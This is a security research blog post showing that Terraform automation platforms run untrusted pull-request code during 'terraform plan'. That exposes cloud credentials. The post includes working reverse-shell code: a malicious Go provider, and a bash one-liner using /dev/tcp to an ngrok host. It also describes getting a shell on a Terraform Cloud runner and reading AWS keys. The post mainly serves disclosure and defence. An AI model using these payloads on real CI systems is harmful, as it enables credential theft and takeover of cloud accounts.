GitFlops: The dangers of Terraform automation platforms

November 7, 2024

12 min read

Terraform is today’s leading Infrastructure-as-Code platform, relied upon by organizations ranging from small startups to multinational corporations. It enables teams to declaratively manage their cloud or on-premises infrastructure, allowing them to provision or decommission infrastructure components simply, consistently, and with auditability.

At a high level, infrastructure is defined in HCL (HashiCorp Configuration Language) inside *.tf files, and the Terraform program is then run against those definitions. Terraform has two key commands, plan and apply. The former is a read-only operation that builds a plan describing which resources will be created, modified, or deleted in the target environment; the latter deploys those changes. Both operations need to know the current state of the target infrastructure to determine which resources already exist and which must be created or changed. This is tracked in the Terraform state, which describes the current state in a declarative manner. For a more in-depth overview of Terraform, see the HashiCorp documentation.

Terraform users must manage the Terraform state and cloud service provider credentials, and execute Terraform themselves. This can be challenging even for small Terraform deployments, and it quickly gets messier when large teams with a cloud-first approach manage complex infrastructure.

In this post, we explore how systems designed to automate Terraform lifecycle management can be exploited to compromise entire cloud environments, far beyond the scope of what a single team should have access to.

Automation Approach

Organizations adopt several popular SaaS and open-source platforms to automate their Terraform lifecycle management. Two of the most popular are HashiCorp's Terraform Cloud and Atlantis, but all of the products we reviewed follow the same general pull-request-based approach.

In this pull-request-based workflow, a repository (or set of repositories) contains HCL files that describe the target infrastructure. When a team needs to modify or create a resource for their project, they create a new branch where they define the resources in HCL. Once the changes are ready, they open a pull request to merge the feature branch into the main branch. At this point, an automated job detects the pull request, runs terraform plan against the modified files, and adds a comment to the pull request containing the output of the plan. A trusted SRE or DevOps team member then reviews the plan and ensures the changes are safe, at which point they can add a comment instructing the automation platform to deploy the new HCL files via terraform apply.
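The ordering in this workflow matters for the rest of the post, so here is a minimal Go sketch of it. The `Event` type, the `"apply"` comment text, and the `NextStep` function are hypothetical names invented for illustration; they do not correspond to any specific platform's API. The point it shows is that plan runs for any author before a human review, while apply is gated on a trusted reviewer.

```go
package main

import "fmt"

// Event is a simplified pull request event (hypothetical shape for this sketch).
type Event struct {
	Kind    string // "opened", "updated", or "comment"
	Author  string
	Comment string
}

// NextStep returns the Terraform command the automation would run for an
// event, or "" when it does nothing. trusted lists reviewers allowed to apply.
func NextStep(e Event, trusted map[string]bool) string {
	switch e.Kind {
	case "opened", "updated":
		// Runs for any author, before a human has looked at the HCL.
		return "terraform plan"
	case "comment":
		// Only a trusted reviewer can trigger the deployment.
		if e.Comment == "apply" && trusted[e.Author] {
			return "terraform apply"
		}
	}
	return ""
}

func main() {
	trusted := map[string]bool{"sre-alice": true}
	fmt.Println(NextStep(Event{Kind: "opened", Author: "contributor"}, trusted))
	fmt.Println(NextStep(Event{Kind: "comment", Author: "sre-alice", Comment: "apply"}, trusted))
}
```

In this model, the access control sits entirely in front of apply; nothing stands between an untrusted branch and the plan step.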

Attacking the flow

While there are several potential attack points in this process, we aren’t interested in bypassing the access control logic of who can run terraform apply or conducting attacks to take over the SRE. Instead, we’ll focus on the execution of terraform plan.

Executing terraform plan will create an execution plan that lets you preview the changes that Terraform plans to make to the target infrastructure. By default, this command:

Reads the current state of any already existing remote objects, ensuring the Terraform state is up-to-date.

Compares the current configuration to the prior state and notes any differences.

Proposes a set of change actions that should, if applied, make the remote objects match the configuration.

The plan operation does not deploy the proposed changes; it is only used to check that they match what is expected before they are deployed using apply.
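The three steps above can be sketched as a toy diff in Go. This is a simplification under stated assumptions, not how Terraform is implemented: resources are reduced to an address mapped to a single attribute string, and the `Plan` function and `Action` type are names made up for this example. In real Terraform, reading remote objects and computing the diff are delegated to provider plugins.

```go
package main

import (
	"fmt"
	"sort"
)

// Action is the change proposed for one resource address.
type Action string

const (
	Create Action = "create"
	Update Action = "update"
	Delete Action = "delete"
)

// Plan compares the desired configuration with the refreshed state and
// returns the proposed action per resource address. Unchanged resources are
// omitted. Both maps go from resource address to a serialized attribute
// string (a simplification made for this sketch).
func Plan(config, state map[string]string) map[string]Action {
	actions := make(map[string]Action)
	for addr, want := range config {
		have, exists := state[addr]
		switch {
		case !exists:
			actions[addr] = Create
		case have != want:
			actions[addr] = Update
		}
	}
	for addr := range state {
		if _, wanted := config[addr]; !wanted {
			actions[addr] = Delete
		}
	}
	return actions
}

func main() {
	state := map[string]string{
		"aws_s3_bucket.logs":  "acl=private",
		"aws_instance.legacy": "type=t2.micro",
	}
	config := map[string]string{
		"aws_s3_bucket.logs": "acl=public-read",
		"aws_instance.web":   "type=t3.small",
	}
	actions := Plan(config, state)

	// Sort addresses so the printed plan is stable across runs.
	addrs := make([]string, 0, len(actions))
	for addr := range actions {
		addrs = append(addrs, addr)
	}
	sort.Strings(addrs)
	for _, addr := range addrs {
		fmt.Printf("%-8s %s\n", actions[addr], addr)
	}
}
```

Nothing in this sketch changes the target environment, which is why plan is usually described as read-only. The sketch leaves out the part that matters for the attack: who executes the code that does the reading and diffing.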

Though this process sounds benign and read-only, it's a little more complex. Terraform uses providers, which are plugins that allow Terraform to communicate with an external API, such as AWS. This is crucial because it’s how Terraform interacts with the infrastructure provider to plan and deploy changes. These provider plugins are written in Go and are hosted in the Terraform Registry. This means we can create a custom provider for a fictitious cloud provider that executes our malicious command when the plugin is loaded to determine what resources will be planned.

Local PoC

To verify this works, we will create a basic provider that will spawn a reverse shell to a localhost listener. Below is an excerpt from our malicious provider:

    package main

    import (
        "net"
        "os/exec"

        "github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
        "github.com/hashicorp/terraform-plugin-sdk/v2/plugin"
    )

    // revshell connects to the local listener and attaches a shell to it.
    func revshell() {
        c, _ := net.Dial("tcp", "127.0.0.1:1337")
        cmd := exec.Command("/bin/sh")
        cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c
        cmd.Run()
        c.Close()
    }

    func main() {
        // Runs as soon as Terraform launches the plugin binary.
        revshell()

        plugin.Serve(&plugin.ServeOpts{
            ProviderFunc: func() *schema.Provider {
                return &schema.Provider{
                    DataSourcesMap: map[string]*schema.Resource{
                        // dataSourceHelloWorld is not shown in this excerpt.
                        "example": dataSourceHelloWorld(),
                    },
                }
            },
        })
    }

We leverage the entry point of the provider plugin and immediately invoke the revshell() function, which spawns our reverse shell. We can then compile the plugin and either publish the provider to the Terraform Registry or, as in our basic test case, install it to the local Terraform plugin directory at ~/.terraform.d/plugins/local/ to verify successful exploitation during a terraform plan.

Once this is ready, we can define a basic Terraform file to consume our provider.

terraform {

required_providers {

example = {

source = "local/exampleprovider/example"

version = "0.1.0"

}

}

}

provider "example" {

}

resource "example_resource" "example" {





}Finally, make sure you have a listener to catch the reverse shell and run terraform init and terraform plan

As you can see below, our netcat listener has caught our reversal shell and we have an interactive session on the machine used to run the terraform plan.

Data sources

In addition to using a custom provider, HCL also supports data sources. Data sources allow Terraform to use information defined outside of Terraform and are accessed via a special kind of resource known as a data resource, declared using a data block.

Below is a basic example of a data block using the data source aws_region to fetch the current AWS region and make it available via a resource named current.

    data "aws_region" "current" {}

    output "region_name" {
      value = data.aws_region.current.name
    }

As attackers, we find a few data sources useful, but the most interesting one is external. The HashiCorp documentation describes this as:

“The external data source allows an external program implementing a specific protocol to act as a data source, exposing arbitrary data for use elsewhere in the Terraform configuration.”

Let’s see an example of how the external source can achieve code execution during a Terraform plan.

    data "external" "example" {
      program = ["/bin/bash", "${path.module}/revshell.sh"]
    }

Our script is located in the same directory and can be included in a malicious pull request. Here we just have a basic reverse shell.

#!/bin/bash

/bin/bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/19863 0>&1



echo '{"success": true}Again, running terraform plan will invoke our script giving us an interactive reverse shell.

Taking it to the automation platforms

Now that we have verified we can obtain code execution when the read-only terraform plan command is run on untrusted HCL, let’s look at what services are available to automate Terraform lifecycle management. The table below shows the platforms we looked at during our research.

| Platform | Hosted | Open source |
| --- | --- | --- |
| Terraform Cloud | ✅ | ❌ |
| Atlantis | ❌ | ✅ |
| Digger | ✅ | ✅ |
| Env0 | ✅ | ❌ |
| Terrateam | ✅ | ✅ |

To test this we first created an account on the Terraform Cloud platform and created a test repository that contains all our HCL Terraform files for a mock infrastructure. We then imported the repository into the platform with all default settings and configured the AWS provider with secrets to access an AWS account.





Once the Terraform Cloud platform was set up, we spawned a listener to catch our reverse shell and then created a branch of our infrastructure repository, made some changes, and opened a pull request back to the main branch. At this point, the Terraform Cloud platform saw our pull request and automatically ran terraform plan against it.



Now if we check our netcat listener, we can see that we have a fully interactive shell on an ephemeral container used to run Terraform. When we check the environment variables, we can see we have access to the AWS credentials that are used to provision the actual infrastructure when terraform apply is run.

With these credentials, we have the same access to the target environment that Terraform has, and given this is used to manage the cloud provider, it’s likely we have control over the entire AWS account.

We checked each of the five Terraform lifecycle management platforms listed in the above table, and all five were susceptible to this attack under the default configuration.

HashiCorp and Atlantis were both aware of this problem and already warned about the dangers of speculative plan operations in their documentation (HashiCorp Threat Model, Atlantis).

The remaining three platforms were not aware of this attack and therefore had no documentation warning users about the risks of running speculative plan operations. All three recognized this as a serious problem and subsequently added documentation to inform their users of the risks.

Digger: Added this page to their documentation and is assessing additional approaches to mitigate these risks.

Env0: Added this page to their documentation.

Terrateam: Added this page to their documentation.

Mitigations

While Terraform automation platforms generally advise against running speculative plans if there are concerns around unsafe HCL code, this approach isn’t practical for most organizations. Fortunately, since HCL is a straightforward declarative language, it’s relatively simple to extract a list of proposed providers and data sources. This can be integrated into a Continuous Integration (CI) job, where the proposed providers and data sources are checked against a predefined allowlist, blocking any untrusted ones. We won’t dive into specifics here, as CI platforms and Terraform automation tools vary in configuration, but this approach should be feasible across CI environments. For the job itself, a basic script will suffice, though tools like Conftest with a simple Rego policy could also streamline the process.
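As a rough illustration of the "basic script" option, the Go sketch below pulls `source = "..."` attributes and `data "TYPE" "NAME"` block headers out of HCL text and reports anything missing from an allowlist. Everything here is an assumption made for the example: the `Violations` function, the allowlist contents, and above all the use of regular expressions. A regex scan is easy to evade (for instance via the JSON `.tf.json` syntax), it also matches module `source` attributes, and it does not see providers that are only implied by a resource type, so a real job should use a proper HCL parser and treat this only as an outline of the check.

```go
package main

import (
	"fmt"
	"regexp"
)

var (
	// Matches `source = "..."` attributes, as used in required_providers.
	// This also matches module sources, which the sketch treats the same way.
	sourceRe = regexp.MustCompile(`\bsource\s*=\s*"([^"]+)"`)
	// Matches `data "TYPE" "NAME"` block headers and captures TYPE.
	dataRe = regexp.MustCompile(`\bdata\s+"([^"]+)"\s+"[^"]+"`)
)

// Violations returns every source and data source type found in the HCL
// text that is missing from the given allowlists.
func Violations(hcl string, allowedSources, allowedData map[string]bool) []string {
	var out []string
	for _, m := range sourceRe.FindAllStringSubmatch(hcl, -1) {
		if !allowedSources[m[1]] {
			out = append(out, "source "+m[1])
		}
	}
	for _, m := range dataRe.FindAllStringSubmatch(hcl, -1) {
		if !allowedData[m[1]] {
			out = append(out, "data "+m[1])
		}
	}
	return out
}

func main() {
	// Sample input combining the provider and data source examples above.
	hcl := `
terraform {
  required_providers {
    example = {
      source  = "local/exampleprovider/example"
      version = "0.1.0"
    }
  }
}

data "aws_region" "current" {}

data "external" "example" {
  program = ["/bin/bash", "${path.module}/revshell.sh"]
}
`
	// Hypothetical allowlists; each organization would define its own.
	allowedSources := map[string]bool{"hashicorp/aws": true}
	allowedData := map[string]bool{"aws_region": true}

	for _, v := range Violations(hcl, allowedSources, allowedData) {
		fmt.Println("blocked:", v)
	}
}
```

In a CI job, a non-empty result would fail the build so that the automation platform never runs a speculative plan on the pull request. The scan deliberately ignores line position and comments, so it errs toward false positives rather than missed matches.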

Final thoughts

While documentation on speculative plan risks is a step in the right direction, we believe Terraform automation platforms should adopt secure defaults and enforce built-in validation for providers and data sources. This would genuinely address these risks impacting most Terraform users.

The reality is that these tools often don’t serve their purpose. Designed to limit cloud secret exposure, and ensure automated and safe infrastructure changes, they inadvertently provide any user with access to sensitive cloud credentials when speculative plans are enabled — a scenario no SRE or security team would knowingly permit. When speculative plans are disabled, the platform’s utility is significantly diminished, as SREs must review HCL changes manually and execute plans themselves. This exposes a critical gap: these platforms, in their current form, fall short of offering the security and efficiency they promise.
